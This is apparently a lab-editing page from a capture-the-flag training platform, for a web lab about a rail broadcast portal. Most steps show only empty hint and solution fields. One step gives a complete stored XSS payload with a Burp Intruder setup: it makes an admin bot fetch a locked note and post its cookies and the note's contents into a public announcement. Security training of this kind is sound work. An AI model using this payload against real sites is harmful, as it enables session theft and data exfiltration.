Hintru EN ES ← All labs

✎

Improve lab

Improved version of MesaNet Portal — Rail Broadcasts

You are creating a new version of this lab. The original stays untouched. Your version will be signed by a cryptographic key generated in your browser — no email, no password. If you clear browser data without exporting your identity, you lose authorship over your contributions.

You do not have a signing identity yet in this browser.

Lab metadata

Title Summary Target type Difficulty Tags (comma-separated)

Steps

Map the gateway API surface

▾

Phase recon, web, foothold, privesc, etc. Title Short action-oriented title. Avoid spoiling the vuln class.

Objective What the student must achieve in this step. Context Optional: setup or prior info needed.

💡 Hint 1 — directional

Directional nudge — point at where to look without naming the technique.

🎯 Hint 2 — technique

Reveal the vulnerability class or technique without the exact payload.

🔑 Hint 3 — near solution

Near-solution: specific approach or command without the final flag.

Solution Exact command, payload, or approach. Code stays in original language. Validation criteria What a correct attempt DOES (action), not what output it produces.

Locate the locked confidential note

▾

Phase recon, web, foothold, privesc, etc. Title Short action-oriented title. Avoid spoiling the vuln class.

Objective What the student must achieve in this step. Context Optional: setup or prior info needed.

💡 Hint 1 — directional

Directional nudge — point at where to look without naming the technique.

🎯 Hint 2 — technique

Reveal the vulnerability class or technique without the exact payload.

🔑 Hint 3 — near solution

Near-solution: specific approach or command without the final flag.

Solution Exact command, payload, or approach. Code stays in original language. Validation criteria What a correct attempt DOES (action), not what output it produces.

Understand the oversight bot

▾

Phase recon, web, foothold, privesc, etc. Title Short action-oriented title. Avoid spoiling the vuln class.

Objective What the student must achieve in this step. Context Optional: setup or prior info needed.

💡 Hint 1 — directional

Directional nudge — point at where to look without naming the technique.

🎯 Hint 2 — technique

Reveal the vulnerability class or technique without the exact payload.

🔑 Hint 3 — near solution

Near-solution: specific approach or command without the final flag.

Solution Exact command, payload, or approach. Code stays in original language. Validation criteria What a correct attempt DOES (action), not what output it produces.

Confirm the HTML injection sink in broadcast creation

▾

Phase recon, web, foothold, privesc, etc. Title Short action-oriented title. Avoid spoiling the vuln class.

Objective What the student must achieve in this step. Context Optional: setup or prior info needed.

💡 Hint 1 — directional

Directional nudge — point at where to look without naming the technique.

🎯 Hint 2 — technique

Reveal the vulnerability class or technique without the exact payload.

🔑 Hint 3 — near solution

Near-solution: specific approach or command without the final flag.

Solution Exact command, payload, or approach. Code stays in original language. Validation criteria What a correct attempt DOES (action), not what output it produces.

Craft the exfiltration payload

▾

Phase recon, web, foothold, privesc, etc. Title Short action-oriented title. Avoid spoiling the vuln class.

Objective What the student must achieve in this step. Context Optional: setup or prior info needed.

💡 Hint 1 — directional

Directional nudge — point at where to look without naming the technique.

🎯 Hint 2 — technique

Reveal the vulnerability class or technique without the exact payload.

🔑 Hint 3 — near solution

Near-solution: specific approach or command without the final flag.

Solution Exact command, payload, or approach. Code stays in original language. Validation criteria What a correct attempt DOES (action), not what output it produces.

Flood the broadcast table to guarantee bot trigger

▾

Phase recon, web, foothold, privesc, etc. Title Short action-oriented title. Avoid spoiling the vuln class.

Objective What the student must achieve in this step. Context Optional: setup or prior info needed.

💡 Hint 1 — directional

Directional nudge — point at where to look without naming the technique.

🎯 Hint 2 — technique

Reveal the vulnerability class or technique without the exact payload.

🔑 Hint 3 — near solution

Near-solution: specific approach or command without the final flag.

Solution Exact command, payload, or approach. Code stays in original language.

// Burp Intruder setup:
// Endpoint: POST /gateway (same session cookie as operator)
// Body template:
{
  "id": "f7d4e8b2-3a1c-4f9e-8b2d-1c5e7a9f3b6d",
  "endpoint": "/api/rail/create",
  "data": {
    "type": "safety",
    "message": "<img src=x onerror='fetch(\"/gateway\",{method:\"POST\",headers:{\"Content-Type\":\"application/json\"},credentials:\"include\",body:JSON.stringify({id:\"a7f3c4e9-8b2d-4a6f-9c1e-5d8a3b7f2c4e\",endpoint:\"/api/notes/get\",data:{id:6}})}).then(r=>r.json()).then(d=>fetch(\"/gateway\",{method:\"POST\",headers:{\"Content-Type\":\"application/json\"},credentials:\"include\",body:JSON.stringify({id:\"f7d4e8b2-3a1c-4f9e-8b2d-1c5e7a9f3b6d\",endpoint:\"/api/rail/create\",data:{type:\"announcement\",message:\"PWN_\"+document.cookie+\"_\"+JSON.stringify(d).slice(0,400),timestamp:\"00:00:01\",priority:\"low\"}})}))'>",
    "timestamp": "§00:00:00§",
    "priority": "high"
  }
}
// Intruder Payload: Custom iterator
// Position 1: 00,01,02,...,23  (24 items)
// Position 2: :
// Position 3: 00,05,10,15,20,25,30,35,40,45,50,55  (12 items)
// Position 4: :00
// Total: 288 requests

Validation criteria What a correct attempt DOES (action), not what output it produces.

Trigger the oversight bot

▾

Phase recon, web, foothold, privesc, etc. Title Short action-oriented title. Avoid spoiling the vuln class.

Objective What the student must achieve in this step. Context Optional: setup or prior info needed.

💡 Hint 1 — directional

Directional nudge — point at where to look without naming the technique.

🎯 Hint 2 — technique

Reveal the vulnerability class or technique without the exact payload.

🔑 Hint 3 — near solution

Near-solution: specific approach or command without the final flag.

Solution Exact command, payload, or approach. Code stays in original language. Validation criteria What a correct attempt DOES (action), not what output it produces.

Recover the flag from the bot-created announcement

▾

Phase recon, web, foothold, privesc, etc. Title Short action-oriented title. Avoid spoiling the vuln class.

Objective What the student must achieve in this step. Context Optional: setup or prior info needed.

💡 Hint 1 — directional

Directional nudge — point at where to look without naming the technique.

🎯 Hint 2 — technique

Reveal the vulnerability class or technique without the exact payload.

🔑 Hint 3 — near solution

Near-solution: specific approach or command without the final flag.

Solution Exact command, payload, or approach. Code stays in original language. Validation criteria What a correct attempt DOES (action), not what output it produces.